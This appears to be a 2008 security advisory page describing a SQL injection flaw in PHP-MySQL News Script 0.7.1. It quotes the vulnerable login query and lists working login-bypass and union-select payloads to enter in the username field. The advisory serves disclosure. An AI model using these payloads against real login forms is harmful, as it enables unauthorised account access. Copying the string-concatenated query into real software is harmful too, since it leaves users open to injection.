PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability

2008.08.05
Credit: suN8Hclf
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-89

]#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#[ ] [ ] Name : Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability [ ] Author: suN8Hclf[crimsoN_Loyd9], DaRk-CodeRs Group [ ] Source: http://sourceforge.net/project/showfiles.php?group_id=26365 [ ] Greetz: c0ndemned, 0in and other DaRk-CodeRs guys, wizZ [ ] [ ]#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#[ Conditions: MAGIC_QUOTES=OFF Vulnerable Code(login.php): ---------------------------------------CODE (login.php)---------------------------------------------------------------- mysql_select_db($db); $query = mysql_query("select id,password from users where name = '$username' and password = password('$pass')"); if(mysql_num_rows($query) == 1) ----------------------------------------------------------------------------------------------------------------------- Exploit: All strings should be put down into username box in login.php [1]. Login bypass A. admin' OR 1=1/* DESC: This will log us into the admin's account B. fdfds' OR 1=1 limit x/* where x - from 0 to... i dont know ;) DESC: This will log us into the user's account which is x-nd in the table [2]. Classic Remote SQL Injection ' AND 1=2 union select 1,2/*

References:

http://seclists.org/bugtraq/2008/Aug/0024.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top